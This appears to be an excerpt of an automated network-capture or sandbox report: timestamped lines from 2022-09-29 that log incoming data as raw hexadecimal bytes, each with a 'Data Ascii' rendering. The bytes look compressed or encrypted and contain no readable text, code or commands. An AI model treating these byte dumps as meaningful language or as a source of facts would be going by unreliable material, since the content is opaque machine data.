                                                                                                        2022-09-29 12:45:44 UTC5816INData Raw: 9d a2 c0 50 54 b1 be d1 46 db b8 82 c6 a7 4b 82 1b 20 26 ef ce 59 5a 1d c3 3c b8 1d cd ff 9b d8 d9 ae cf 44 ba 49 ad 6d b7 41 66 e9 57 bc 6e 3c e0 5a 02 15 19 92 0c ea d1 56 e0 93 c0 15 09 4b 24 ce 4e 32 3f d1 0d 75 8e 62 16 32 53 9a 64 ea 0e f9 9a af 97 f2 65 83 bf 1b 77 f3 10 16 3b 07 7c 06 51 6b e6 03 bf c6 64 1a 86 9e c8 97 f0 10 be 20 f7 3f c8 90 1b db ee 52 c8 35 89 ec 05 75 9c 56 80 ee 4d 9f 0f 03 94 85 5a 4e 3a df 50 2b af 0d 3a 4a ac 5e a6 29 72 7c e0 aa f6 f6 87 ac 65 8c b0 b9 de af 89 86 4f 25 97 22 85 d2 55 b2 d6 2b 17 be 3d af 74 39 45 9a c4 21 16 be 65 6f b2 44 e4 79 01 6f 41 7e c5 8b b8 a5 03 86 85 8c 67 97 18 e0 31 09 7e e3 b9 93 6f e3 96 e5 29 dd a4 d1 51 0d e3 0a 0f ce 80 8f 8d 0a 24 82 ac 7d 17 54 6e e8 be 7e 38 fb f4 26 e0 a6 f3 3b 1b
                                                                                                        Data Ascii: PTFK &YZ<DImAfWn<ZVK$N2?ub2Sdew;|Qkd ?R5uVMZN:P+:J^)r|eO%"U+=t9E!eoDyoA~g1~o)Q$}Tn~8&;
                                                                                                        2022-09-29 12:45:44 UTC5832INData Raw: 4a 07 f3 30 0f ed 71 b7 00 e5 5d 47 88 f2 4d a9 3e 55 b5 cb 54 0c c2 e6 a7 1f da a1 f5 d2 f0 55 24 f1 c7 4d 66 f6 bc 4e 66 96 eb 03 56 44 a4 f2 14 f1 90 37 59 aa a4 86 ac 17 a2 6d 6e 96 20 3c 5d e2 bf 02 ea 1a ac e1 88 90 38 7c aa 20 07 3f e7 32 dc 98 ee 33 8f 5f 7b 94 fc 2f aa bb 86 ee 31 d2 26 ec fb f6 96 06 65 d8 3b b8 96 cc 3d fe 3c bf a5 1c ae ff 20 97 cf f9 ae d9 f9 0c d6 ea b6 1d c7 70 d0 6c 0b 2e bd 5d b0 99 19 80 99 b5 62 83 ff 2c 06 94 a6 3a 2a 82 e6 82 cf b0 20 02 bb 32 b7 d0 ac 73 0d 41 ba 87 ea a4 26 de 80 3f d6 d4 b1 fb 83 79 43 1c 81 c5 3c c9 d5 f4 c8 50 b0 08 f0 02 33 b0 52 a4 7f 65 1a 58 db e1 7d fd c7 82 83 11 ea 34 52 00 7a eb da 46 07 29 83 10 5b a1 d1 4a c2 68 9e 70 80 c1 ca 2b be da 66 ba 2a 95 86 a7 7e 52 ef c9 4a f7 7c fb 5b 2f 1f
                                                                                                        Data Ascii: J0q]GM>UTU$MfNfVD7Ymn <]8| ?23_{/1&e;=< pl.]b,:* 2sA&?yC<P3ReX}4RzF)[Jhp+f*~RJ|[/
                                                                                                        2022-09-29 12:45:44 UTC5848INData Raw: 79 7b b7 9d 51 8a 4a d2 20 79 d1 99 41 aa 6e ef a1 f2 c8 85 fb 70 0f 68 19 f1 64 1c 91 b1 b0 0d 67 b5 94 eb 86 db d0 b6 ba f6 c5 6c 31 5b 73 53 96 40 86 dc 4d 4a 8f 2a 46 fe 18 94 e5 07 55 e5 ff b3 f7 14 51 26 6f 81 d9 15 41 2b 1b 6d f9 58 8d c1 01 6a d3 e8 19 b7 99 c8 3a 57 03 93 01 98 e3 2d 4a 25 b0 6e 5c 03 53 f7 a6 97 a3 4b 3d 87 a2 b5 00 24 17 2a d7 4e 1f c6 36 65 a7 0b fd 63 3f c7 bd 17 31 58 85 97 df ea 22 94 cc 24 0a a2 59 67 f3 42 a9 50 e3 95 15 55 14 51 8f de 12 6c 6a 71 2a cd d7 2c 58 d2 1f b4 3c fb c0 ef 3d 42 89 08 c8 f2 8b db 00 b5 6b b6 79 7e 22 5b 42 03 22 e8 16 94 45 2f 68 dc 61 8f 6d c2 3d 62 ab 7c 59 cd 17 ab 1c e4 a8 38 1f 76 00 26 38 c9 60 ec de 70 8e e1 04 1c c5 0a 74 f7 ef d5 7c 67 ec 37 d8 7d 86 ea 3b af 3e 6f fb b5 87 09 3f 99 33
                                                                                                        Data Ascii: y{QJ yAnphdgl1[sS@MJ*FUQ&oA+mXj:W-J%n\SK=$*N6ec?1X"$YgBPUQljq*,X<=Bky~"[B"E/ham=b|Y8v&8`pt|g7};>o?3
                                                                                                        2022-09-29 12:45:44 UTC5864INData Raw: a5 96 9b d3 4d 89 2c e2 fa 81 3c 7b 5c 8b 8f 19 51 91 03 d7 47 bb 94 68 ae 27 3e 2d 40 7e e4 f8 ad 61 ce 0e 00 f1 95 5c 55 ba 59 12 4f 64 13 dd 86 69 86 e8 f8 d8 6a 7a cd 8b c0 32 97 99 28 83 67 44 fd b6 d6 d5 37 ed 56 ca 28 0c 57 4b 6e 5c ee 48 84 76 7a 37 5b 64 cd ca 6c 38 db 9d ab da 9b a5 fe e8 61 5b b5 43 48 b6 c8 f7 e4 39 ee b7 2e c2 4a 43 9d 73 e9 01 62 4e a3 65 4b e4 f2 0f 50 bf 56 88 7f 49 b1 ac b5 ae 75 2d 1a 70 1f bc 7b d9 0a d0 46 53 95 87 89 dd 35 28 55 3a 02 83 c2 ec b0 83 e0 f1 53 a1 c9 2c f8 db 2c d6 5f 69 df 58 a5 38 6d bd b1 b7 03 35 5a ca d4 a6 74 af 45 96 05 af 89 5a 2a 83 7e 0e 06 8d 09 57 44 9f f9 cd 0b de 0e 78 cb 6a 06 bd c3 e9 21 6e 9b e2 7d 97 b1 af 5c 18 1d 48 1d f5 9a 2c 36 ca 15 62 45 97 89 d8 65 e3 9f 0d 33 67 e7 2d 75 80 70
                                                                                                        Data Ascii: M,<{\QGh'>-@~a\UYOdijz2(gD7V(WKn\Hvz7[dl8a[CH9.JCsbNeKPVIu-p{FS5(U:S,,_iX8m5ZtEZ*~WDxj!n}\H,6bEe3g-up
                                                                                                        2022-09-29 12:45:44 UTC5880INData Raw: ef a7 a4 8f 56 c0 e6 8e 7d f8 48 be 08 15 fa 69 00 e5 e0 00 b4 c4 d5 d6 f4 a8 00 a5 d2 42 69 5e 61 d5 5e 75 78 aa 73 2b a5 b1 fa 0e 0b 1b 19 13 f2 51 04 55 22 bd 49 33 df e8 8f 51 43 ef 36 6d ac 56 a2 b5 58 d2 d0 62 9c 6e 87 3c e5 dc b4 cc 2d 4a 14 a6 5a 87 48 80 71 b4 e5 b7 10 04 64 d4 f2 09 be 92 e0 9c b2 06 a2 5c 02 7b 98 c5 e0 f1 66 00 01 f1 78 03 73 5c 36 d4 fe 14 36 93 a4 36 01 ae 67 0e 7b d9 a3 2d 75 c6 9d 59 bc d9 5a cb 17 37 f1 be a9 9b cd 29 68 63 db 68 d3 87 b0 41 45 a9 41 0d f3 69 d2 01 e5 87 c3 b5 a7 2f 41 3c e7 21 bf c2 ef 5d 3c df 2b 7c 0a 83 e8 08 d6 94 f8 0c 5a 4b 0b ac 15 58 c7 f4 ae 0c ff 7e dd e9 4a af 66 d5 63 e7 b1 f1 05 08 a0 d2 ed 70 19 6e aa 9b 4b a5 c4 ff fa 63 66 bb 63 a7 55 19 2c 16 de 20 01 71 ea b9 54 d3 79 00 fb 56 b2 2a c3
                                                                                                        Data Ascii: V}HiBi^a^uxs+QU"I3QC6mVXbn<-JZHqd\{fxs\666g{-uYZ7)hchAEAi/A<!]<+|ZKX~JfcpnKcfcU, qTyV*
                                                                                                        2022-09-29 12:45:44 UTC5896INData Raw: 62 77 f6 9d 11 2f 67 e9 5b 54 cd 3e ff 37 9c ac d2 19 4f a0 19 89 47 24 b5 2e 70 c7 a2 e6 0e b6 23 8e fa 3f 43 43 4f 90 df 5c 63 46 19 b6 4b b2 fb 30 6c fc 92 14 24 81 06 93 ed 15 94 d2 5a d8 3a d2 9e 3d 96 f7 34 b9 fe 4b 8d 01 89 92 d5 2a 8f 25 25 18 4a b5 f9 7b 4a fa 4c 3d be f7 2e 91 ef 74 76 7b 6e 89 e7 7e 5c c2 22 02 ac c5 30 0d e7 16 0d 47 cf 1a 37 fa 4c db a8 5a d6 d0 dd eb f9 f8 8d 81 3c 65 3b a3 f5 be cc 04 e0 72 ab 10 6b 0f b7 61 7f 11 d5 19 b2 4d ae 35 80 72 25 c4 63 fa b9 24 0f 32 fd fa 1c 7b ab ac f0 a9 0d 3e 57 af 76 9c 90 57 13 90 43 04 bf 07 24 b7 95 52 0b 8a 1f f8 a5 35 c0 1d cb 62 67 f0 e8 4b ac 5d 86 6a ea c9 e9 e4 e1 d6 88 4b fe 5a df 62 e2 3d 87 c1 25 61 5e ee a5 c8 7d 9f 06 a6 fa 7f e7 f4 69 e7 c0 d2 78 38 3a 98 d3 44 c3 8a 76 68 aa
                                                                                                        Data Ascii: bw/g[T>7OG$.p#?CCO\cFK0l$Z:=4K*%%J{JL=.tv{n~\"0G7LZ<e;rkaM5r%c$2{>WvWC$R5bgK]jKZb=%a^}ix8:Dvh
                                                                                                        2022-09-29 12:45:44 UTC5912INData Raw: ef d3 47 fc f9 7f 37 a7 25 de f7 1b 81 6e 1c 66 e4 cc b4 de 77 e1 b5 47 f8 58 02 89 c3 39 ca 30 26 a8 1d 4c ed 82 7c a7 8c 65 1d 87 a9 82 f0 b0 9f 9f 0e 06 b4 fa 4b 88 70 d9 59 2d c4 d5 56 49 4e 03 14 54 eb 74 43 6d e7 50 af 4c 52 de f5 74 65 d1 0b bc 6b 05 dd ac ec d6 2f 51 af 93 5e a1 7a 4c fb 64 36 50 d7 f5 6c ed 2f 3b 8d f1 d6 a8 2d 35 94 34 2e 3a 8d c0 79 01 2a f1 6d 12 31 8a e5 90 e6 fe cb a6 b4 f0 6b 52 28 75 be 1e 8a 91 a6 ac 54 30 6c 78 f5 a6 80 e3 78 93 96 ef 7b d2 e1 33 f6 bd 70 61 2a 18 ab a3 c4 31 4d 68 0c d7 24 4d ea 71 0b 09 1a 98 81 33 8a cb a4 fc 42 51 52 dc 48 f1 e5 a2 53 12 e7 be 92 8f c4 30 06 d2 e3 ba 59 13 da 32 78 73 3c 8f 93 3c 65 66 cd 99 72 76 c4 e5 61 a1 73 e9 75 36 d0 b2 28 0d 85 f6 94 a3 59 ee 41 96 f4 df d8 8b 80 8a 4e c5 ff
                                                                                                        Data Ascii: G7%nfwGX90&L|eKpY-VINTtCmPLRtek/Q^zLd6Pl/;-54.:y*m1kR(uT0lxx{3pa*1Mh$Mq3BQRHS0Y2xs<<efrvasu6(YAN
                                                                                                        2022-09-29 12:45:44 UTC5928INData Raw: 00 95 90 d4 69 3a d2 2f 69 e1 a3 38 71 61 5f 16 d6 0b 5f 8a 7d 26 ac 42 ed 71 af 05 ed 0a e6 6f 0a b1 fa 22 10 7b 04 37 c3 60 e6 bb fa 79 5f 16 f1 c3 87 73 6c 4b 0b 62 18 e4 81 c9 ab 6f cd 9e 15 42 28 14 c2 1e 4a ff 23 9b 5f 63 bb 54 a1 4b 8a 7b e8 e6 da 9c 1c 86 6a cd b7 e3 b6 1d 0f 0e e9 d8 a5 a6 b5 b7 2a d0 f3 2c f1 f4 70 4b c1 9d bf 75 1d 0d a2 7f 77 a5 a2 93 e2 a5 2d 1c 0e f4 05 b4 e4 b2 d6 47 a8 79 cd f9 c8 2c e4 56 3f d0 df 5b a7 72 7c fa c2 65 08 f5 9c 05 a9 76 e0 54 69 cd 28 16 4a b6 63 65 5f a0 c3 b6 0a e9 cc 31 48 98 44 e1 12 38 74 7f 90 f4 d4 6a 57 10 a5 8a 98 12 8b cc 7b 1c 6c c1 1c 0a 55 bc 71 0c 85 de 11 3f 52 3a c9 f7 33 9f 6e fb 51 8a 47 ae 84 2d ed 99 43 ae 26 05 30 9b 61 52 4d b8 26 ac 1b 54 4f e7 24 0d 19 ee 3c ce a7 35 0c 98 22 24 6b
                                                                                                        Data Ascii: i:/i8qa__}&Bqo"{7`y_slKboB(J#_cTK{j*,pKuw-Gy,V?[r|evTi(Jce_1HD8tjW{lUq?R:3nQG-C&0aRM&TO$<5"$k
                                                                                                        2022-09-29 12:45:44 UTC5944INData Raw: 91 74 96 69 65 5c a8 f0 77 2e 31 aa 72 ac 89 d4 23 af 4f 4d e0 8f a1 25 99 9b 25 20 10 c7 8b 7f bb 62 41 66 ed 71 49 18 dd 89 99 82 61 58 4f 52 ad ec 08 8b 53 e1 4c 66 14 19 79 10 e0 6a 65 2b 11 20 ba 8d ab 3f 67 29 9a 17 88 56 5d cd 8a b5 58 92 79 14 96 80 4d 2d 06 a1 a9 3f c5 a9 45 75 ee 6e 8c 49 b0 00 67 6d 15 e5 17 7e 17 4a 38 e8 ca 10 1c 84 b0 58 e9 20 5f dd 85 11 a9 b6 f5 5e bd 1e 0d e0 fe 68 86 06 a5 13 18 e2 52 d0 c1 31 5e 82 e5 4f 42 4f c2 31 1a 61 64 9e b9 ba ed 47 8c 0d af ce 89 a3 ff 80 b8 b4 ea 16 f5 0e a9 8c 71 f5 32 ba 34 06 38 db 0b f7 3d 6c 92 d6 ec 29 d7 cb 6e 67 b2 f0 a8 f6 b0 00 eb 78 bb 40 6d 22 e6 52 ad ba a4 0f 7a 4b 6e 2e 20 23 07 e4 b8 ef 19 fa d2 39 2d b4 33 32 55 d5 83 9e 1b 7b e3 54 16 80 e9 62 e0 52 9f c4 f2 23 59 55 da 0d 9b
                                                                                                        Data Ascii: tie\w.1r#OM%% bAfqIaXORSLfyje+ ?g)V]XyM-?EunIgm~J8X _^hR1^OBO1adGq248=l)ngx@m"RzKn. #9-32U{TbR#YU
                                                                                                        2022-09-29 12:45:44 UTC5960INData Raw: 1d 69 0e f2 a4 14 3d 25 57 75 95 ce 4d 3e fe af 27 3d 08 76 76 59 82 f2 12 e8 39 cb 9b f5 90 2e 27 a7 a4 0a 0b 6f 35 1a e0 8a fe 18 57 f3 4c d2 6b 8f 87 c1 04 2f 0b f0 01 1f 14 cc 92 dd 1b d3 6f 25 4c 59 4e c0 de fc 85 f4 45 76 d2 97 7e 49 1f 2f dc 14 7c d8 8d e6 5b 92 da 4f cb 18 9d fe 66 5f 23 7f 0f 03 a3 16 a7 36 a0 51 e9 db d5 36 64 f8 1f 02 cf 0e b7 d7 99 a1 3e 55 d5 ae 12 92 05 ee 53 f9 cd 38 f5 8e 4b e6 64 ab e1 38 08 a7 fd 16 e7 01 ab 48 3f e3 30 71 94 20 ab 76 cd 30 a6 a0 52 27 7f 6a 1b 2e 3f 95 f7 dc c8 b1 f9 b0 8a 3c b8 49 9d f0 db fa 65 e5 9c d6 2e e1 a5 82 37 1d 0e 09 02 b9 ab 42 d4 b7 c6 43 e5 e2 1f ee b5 af 04 15 3a 25 48 79 4f 18 3b 85 d5 f6 fc 02 c5 9a 23 90 c8 f9 b1 cb 58 b7 79 48 7f 38 52 c2 3d 67 d3 37 5e c8 56 94 55 1f bb 81 e7 dc 17
                                                                                                        Data Ascii: i=%WuM>'=vvY9.'o5WLk/o%LYNEv~I/|[Of_#6Q6d>US8Kd8H?0q v0R'j.?<Ie.7BC:%HyO;#XyH8R=g7^VU
                                                                                                        2022-09-29 12:45:44 UTC5976INData Raw: 40 4d ab 8a 50 d3 c8 b3 fc d3 54 6f 84 6c 53 4e 65 e4 be ec de 6c b9 ef 95 65 f7 9c 27 63 6c 2b dd a9 f5 b2 d0 2d 10 4d 5d af 45 a7 8f 97 8c d7 84 93 12 8b 9e 4d 46 b3 41 f9 3c ba f8 1e 32 33 8a 63 81 db 21 3e 81 7f f0 a8 04 b2 45 73 88 ca a7 89 7e 55 71 ed 1b f0 70 c2 29 0d 27 55 24 33 80 5a fd d9 77 28 40 fb c7 4d 16 dd 0a ba 9d 02 cc 82 87 23 e2 8e 8f 3e 2c fa 63 42 aa f0 7e 57 fc d1 61 22 c6 e5 9e 2b 01 9a f7 da ab 75 fb 64 b3 74 80 66 4a fb c8 1e f5 a1 f4 22 4d 5f 08 43 1c 1b f3 09 06 b7 07 26 d8 3b 61 84 84 b5 35 03 1e aa 04 7b 9e 61 11 43 19 11 57 8f 65 94 40 80 05 3d 81 2a f5 3f 93 7f b3 89 f5 b4 d5 24 2a f5 b6 37 d5 89 72 fc 4a 2c ca 9a 0a cb b6 f5 e4 0c e5 bc 6f b0 8a 17 16 3f a6 2b 9f 18 5b e6 e0 22 84 9b 94 1a 25 7b be 0e cd 09 d7 28 bc bc 41
                                                                                                        Data Ascii: @MPTolSNele'cl+-M]EMFA<23c!>Es~Uqp)'U$3Zw(@M#>,cB~Wa"+udtfJ"M_C&;a5{aCWe@=*?$*7rJ,o?+["%{(A
                                                                                                        2022-09-29 12:45:44 UTC5992INData Raw: 78 52 1d e1 ea c6 60 34 5e d4 f0 01 5d ae b5 8d 01 3b c1 12 bd 83 3d b1 ae 50 6a f6 0d ba e8 1d 0e ef 88 7f fe f6 4d ee ed 5d 2c 3f 52 11 9f 3d 8d 75 bc 78 aa b5 67 78 31 b1 bb 9c 2b 34 71 a9 b8 f6 ff b3 21 a3 8c a2 ed 07 36 d1 c1 7e f1 3d 31 6b bb b3 f6 ad e8 7f b9 a3 c3 d2 e2 6e 3e 3e 59 6f 21 8d 6c 1e 8f 05 08 04 ad 23 68 d4 27 8b 38 aa 57 37 92 9e 2c fc a1 14 74 53 78 9a d6 61 3b d4 3c 3e 24 a8 62 6e 28 d9 4d 83 61 e2 1d 96 b1 56 8e 2d 9f eb a6 8c e4 37 36 b5 01 75 08 d2 49 46 9c f1 d4 25 c1 53 40 fd 0c 24 9c 15 c3 03 72 6e a0 a3 3a 8f fc 05 70 41 62 aa f5 14 36 76 b1 68 e3 2e f4 fc 1a 9d cc 89 94 8c 69 91 42 a7 79 91 f0 c8 d7 f8 16 43 f4 36 07 dd 26 a1 1e ae 19 49 48 c3 79 b1 e6 5b fc 4e 3d 30 2b 84 88 ff 3d 20 b2 a6 e4 42 2c 7b 63 78 31 64 5d fd b4
                                                                                                        Data Ascii: xR`4^];=PjM],?R=uxgx1+4q!6~=1kn>>Yo!l#h'8W7,tSxa;<>$bn(MaV-76uIF%S@$rn:pAb6vh.iByC6&IHy[N=0+= B,{cx1d]
                                                                                                        2022-09-29 12:45:44 UTC6008INData Raw: 36 1f a7 03 91 96 10 9c 4a d9 48 6b 92 a5 3e ac 53 5c eb ed e0 e4 3d df 49 18 47 05 73 0f 74 87 ba 44 43 95 74 8b c8 3d 69 e6 52 5d 05 83 24 01 0e d3 0d d3 9e d4 ce 73 dd 7d 4e 44 36 18 84 09 63 8e bf b3 ee 61 80 54 c3 5a 2b 03 d1 f0 b1 0b 00 0d 72 28 f7 06 3d 58 03 29 3b f1 b2 ec 67 56 1f dd ed 98 08 c2 26 aa a1 fa 4b 43 d5 0c c2 7a 73 38 ac e2 5e 45 e0 fc e5 ab 65 13 9d e1 92 af 10 c9 92 c5 68 38 6e 41 27 3c b9 28 ba 85 13 05 7c ba 7b 51 ec 49 89 04 a2 1e 58 59 ff 7f 4e c5 b0 32 59 e9 cf 9c 3c a2 c0 c1 14 cc c8 41 4c 77 ca 47 ff 80 91 34 9d fb d2 03 c5 2c 99 f6 34 92 21 a5 7a 67 d7 06 4d 67 13 13 84 63 b7 08 09 1a b2 f4 0a d4 a1 6e ee df bb 0c 70 12 5b 8a 49 57 1b c1 dc 30 09 66 8d 70 8b 23 61 16 d9 57 73 69 4d 14 bb ce 6d bc de 9d fc 69 2c 7e 20 9e ff
                                                                                                        Data Ascii: 6JHk>S\=IGstDCt=iR]$s}ND6caTZ+r(=X);gV&KCzs8^Eeh8nA'<(|{QIXYN2Y<ALwG4,4!zgMgcnp[IW0fp#aWsiMmi,~
                                                                                                        2022-09-29 12:45:44 UTC6024INData Raw: 55 0a e8 f2 20 c3 2e a2 5a 97 92 3a 4a a3 b0 50 c2 11 e3 bb 7c cc 7f b8 27 b1 67 a6 88 81 59 c6 c8 4b 94 e5 61 ae a6 00 ca e9 c3 05 27 06 4b fc 0d e8 22 b6 b4 69 90 6a 72 9e e4 e5 1d b7 cb 44 e1 3a d2 b8 57 5a 8c df b6 56 66 d7 e1 3c ff 9e 72 5c 6c 50 8e c3 54 e9 41 3c 50 30 67 53 cc 67 86 a3 62 6c ca 98 8c aa 73 dd 7c 38 08 09 19 a5 40 e2 ad cc 0a 2d 1a 80 ae 8c 3f ba 4f 23 1f ab 37 e6 d6 c3 8b 46 13 18 90 c0 1a 06 58 e0 be ec 81 55 d6 14 f6 84 41 75 ff b9 59 27 10 53 d9 1e 91 0c c5 cf 7e 41 91 12 f2 bd 30 cf d7 a8 ac b1 3f 48 00 d2 09 bc 20 cc c5 b9 bd 16 47 dc f7 2f 53 c4 b0 50 c9 93 f0 d8 c2 a1 ad 2f 82 b0 a1 2e 2d 71 fb 57 8d 7e 3b 44 7b 8e 35 0b 85 13 74 88 8b 8c 68 32 0f 22 ce 19 2e 44 0d 17 0a 6a 65 9f de 31 0e a9 92 56 fb 54 ff 2e 5f ce c7 48 71
                                                                                                        Data Ascii: U .Z:JP|'gYKa'K"ijrD:WZVf<r\lPTA<P0gSgbls|8@-?O#7FXUAuY'S~A0?H G/SP/.-qW~;D{5th2".Dje1VT._Hq
                                                                                                        2022-09-29 12:45:44 UTC6040INData Raw: 27 39 d9 7c 26 7a b8 e0 1b 1a cf 45 29 2b e1 c5 7c 4b 2c 3e 05 d9 3d 6d 43 b0 24 aa 1a fa 82 0c f2 9c e8 7f 15 1b 1e 4d de 06 bb 8e 85 5c 86 69 a4 b0 3a d3 f0 a3 00 d1 c5 da 21 92 52 a6 a0 03 95 22 93 5b f1 1b 1d 1d 38 11 8e 6c 30 8f 22 16 81 9a 0a 6b e8 ee 55 b5 94 73 a7 01 23 d5 d6 8a eb 0e 5e a4 73 2d fd 38 5d e0 e9 ac da 9a e8 f8 3c 08 9b 59 c5 a7 40 ad 21 2e 85 2f 3d 61 c6 5a fa 53 ba 4a 5e 1e 39 a7 3d 93 53 5f 6a 45 f9 94 7e a3 03 23 e4 db 44 ea 43 04 cf f1 8f ba 90 cd 29 35 cc 4b 82 82 35 84 62 8d 3a e3 5f 54 01 f2 42 41 9a 23 25 60 c7 a3 31 eb e6 13 f5 7d 4d 75 33 41 23 a9 db 10 d9 51 18 62 94 a1 89 db 63 27 06 7b 51 d9 13 1c a9 95 81 16 60 97 d7 b8 17 b3 2d 90 28 49 de 8e 6d c0 34 8e 72 f3 c6 de 2f ce 89 fc 13 69 84 bb 8d 7d 0f cf 16 36 97 a9 1d
                                                                                                        Data Ascii: '9|&zE)+|K,>=mC$M\i:!R"[8l0"kUs#^s-8]<Y@!./=aZSJ^9=S_jE~#DC)5K5b:_TBA#%`1}Mu3A#Qbc'{Q`-(Im4r/i}6
                                                                                                        2022-09-29 12:45:44 UTC6050INData Raw: e8 0e 83 e8 9f 40 cd 7e a5 04 23 d5 17 47 99 f9 85 cd f0 23 63 73 e2 4d d6 57 81 ae 01 78 79 42 67 3f e3 c1 7c d4 cd 78 d0 e9 96 c8 3e d1 66 74 37 36 f1 28 ae 90 88 8d 38 c8 16 de ac 71 13 21 5c e1 2b b0 8a c5 4c 57 02 67 aa e6 7d bf 5e a3 58 95 0b 80 d7 ac 33 b4 71 8b 01 0f 10 9f 8e b8 1c e1 f4 b0 d7 ec 13 c7 0f 87 6c b1 eb 90 e9 25 59 27 66 c1 80 8f 90 2a 82 83 cf 62 5e 68 ac 69 49 d2 ca 8e 10 9c f9 a9 e3 b6 35 8e 87 a6 ea 15 f7 05 af 1e 0e 6e c5 0a b0 96 33 38 1f 4a 6a ad f9 c8 d4 bc 74 ff 04 a7 c9 3b 3e 37 41 67 96 b7 99 4d 11 bc c0 2a 65 34 29 cc 6b 05 5b 2d 14 09 d6 82 b5 af 0d 53 89 9f 2d 32 ac 02 f3 7f 7b 06 9b 2e 25 7f 8a fe fb c7 3d f4 94 fe 75 e6 d4 ee 7c 11 b9 30 3d 23 2a 33 1d 4b c3 a9 05 5a 78 ba 02 2f ad 7d 7a d2 87 e3 43 63 ce 87 2a 45 7b
                                                                                                        Data Ascii: @~#G#csMWxyBg?|x>ft76(8q!\+LWg}^X3ql%Y'f*b^hiI5n38Jjt;>7AgM*e4)k[-S-2{.%=u|0=#*3KZx/}zCc*E{
                                                                                                        2022-09-29 12:45:44 UTC6066INData Raw: 11 8e 31 61 81 34 70 dd 54 90 bd 48 84 2e 5b 8d 5e 6a 39 ab bd bf 47 9d de 09 27 91 a7 ce 56 1a ad a0 e1 c2 3d e6 88 98 d5 a0 1d db 60 e9 6e 13 2f ab b6 27 10 aa 4f 1c ab df 5e 55 e6 89 b6 ec 38 97 8a 79 36 1d e2 a3 28 4a 6e c6 fd 3c c9 cf 4b 98 e9 d1 d2 5b 7f 8a 22 36 4e 73 e7 c6 c1 d7 f9 50 a6 9e 5d d9 3e ec ee 37 e6 db 0c 8d de d6 9b 9c b0 05 ae 24 39 d2 b9 cc f0 b5 e1 23 ef 5d 49 51 be b8 5b 75 17 0a 19 40 75 84 59 ef f2 c4 32 e5 b2 c3 c7 2c 1f be 3b 42 e4 1e 57 d0 b0 19 ea e7 df 22 cb 5a 86 0f 4b 65 d4 d1 6d 83 3e b7 3f 8f 6e 6e ee 7b 65 22 e7 da 8f a3 53 6a a1 88 d0 d3 a4 36 09 ff d8 e0 2b 7f dc 29 bd 91 39 98 a8 04 d9 0a ed df 9d 3e 61 04 ee a1 85 00 c7 1c 71 2d 41 03 9c 91 46 79 45 b0 6e ef 54 d1 fb 3f 81 c6 4c d5 1e 79 b2 6a e6 d5 dd 88 8b 95 96
                                                                                                        Data Ascii: 1a4pTH.[^j9G'V=`n/'O^U8y6(Jn<K["6NsP]>7$9#]IQ[u@uY2,;BW"ZKem>?nn{e"Sj6+)9>aq-AFyEnT?Lyj
                                                                                                        2022-09-29 12:45:44 UTC6082INData Raw: 8e 26 87 66 54 02 4f bc 8b 13 31 01 34 da e4 f7 98 c1 10 6e ed 28 8b 7e 43 5b 4a 18 89 6f 92 cc 93 e0 e9 ab 5f 63 5e fb 60 80 93 d3 14 b5 51 ca 45 33 72 f4 89 ab e2 36 af e5 23 05 e1 ce e4 d5 cc 6a e3 32 2c 4d 71 ec 03 54 8f 2b c6 7e 21 19 34 32 88 73 b7 70 5e 40 0f a5 39 23 e3 24 6d e7 13 66 bf 85 60 e4 b8 ab 5d fa ac cc e9 33 54 f7 63 cb e8 29 71 d8 47 ba 82 32 e2 b2 53 c1 28 5d 95 d0 3e c1 59 28 81 4b 02 55 f5 60 ed f9 8a 89 7b ed 10 33 c1 8e e4 30 74 f6 69 f1 7d db d2 64 8f 33 51 f7 df 83 27 5e 89 60 ae 34 34 5a d3 24 0c fb d4 be 70 f0 bd 5a 34 aa 97 ac 6f ba 6f 60 1b 2c e2 6d 4a af fa 38 e1 02 23 45 56 e3 85 8d bf d6 73 9d ce ed b3 25 c9 e6 2e 2f b1 f9 25 69 68 7d 15 6e 26 4e 5b 8c 2e 6f 6d 0f 53 a2 be 57 30 52 c7 3f e5 7c bc 98 7d 0f c6 17 b2 51 ac
                                                                                                        Data Ascii: &fTO14n(~C[Jo_c^`QE3r6#j2,MqT+~!42sp^@9#$mf`]3Tc)qG2S(]>Y(KU`{30ti}d3Q'^`44Z$pZ4oo`,mJ8#EVs%./%ih}n&N[.omSW0R?|}Q
                                                                                                        2022-09-29 12:45:44 UTC6086INData Raw: 2e 7c b6 7d 95 8c 7f 15 69 0b 73 23 d5 5a 0f b5 d6 30 f9 ec 61 31 58 0c e4 a1 8b 04 2c 8e d5 56 0a bb f9 fb ea 30 c6 ff f8 08 ab a0 ff 9b 5e 5c 49 04 69 72 74 1f 14 93 93 c5 d1 5b 72 ee e5 16 37 3f 4f 7d 8f d2 f5 b8 cf d1 4b f2 33 3a 66 8f c0 a7 7e 8f 57 1b 12 c1 62 db 7f 01 78 23 36 c4 4c 7e d9 20 d9 91 e0 68 2a 7c ac cc 3f f3 67 3b 3c ef c9 e1 12 50 80 c5 4c f0 0e 6b 9e f0 a8 18 a4 bf ed 2c e7 25 ed dd e8 26 5e 34 c3 21 12 37 26 cb 02 0a a5 a3 ae 3b f1 e0 4d 58 c2 08 71 ef ea 59 ca 0a 2a 57 ef d4 b8 37 f5 e7 d6 37 37 25 14 a3 63 c7 74 5f f3 b7 30 c2 2e 5d af 2f 6f 07 bd ec 4f e6 65 ce 02 83 c3 f8 64 3c c7 74 55 79 6b cb 25 e6 bd 3e 9b 3e 22 78 31 7a 3c 02 09 28 e7 15 cb 7a 75 b2 e6 da d6 bb 0f 4a f0 4c 31 dd 15 12 6f 20 0d 56 91 1f 2e e3 20 a7 00 bc ab
                                                                                                        Data Ascii: .|}is#Z0a1X,V0^\Iirt[r7?O}K3:f~Wbx#6L~ h*|?g;<PLk,%&^4!7&;MXqY*W777%ct_0.]/oOed<tUyk%>>"x1z<(zuJL1o V.
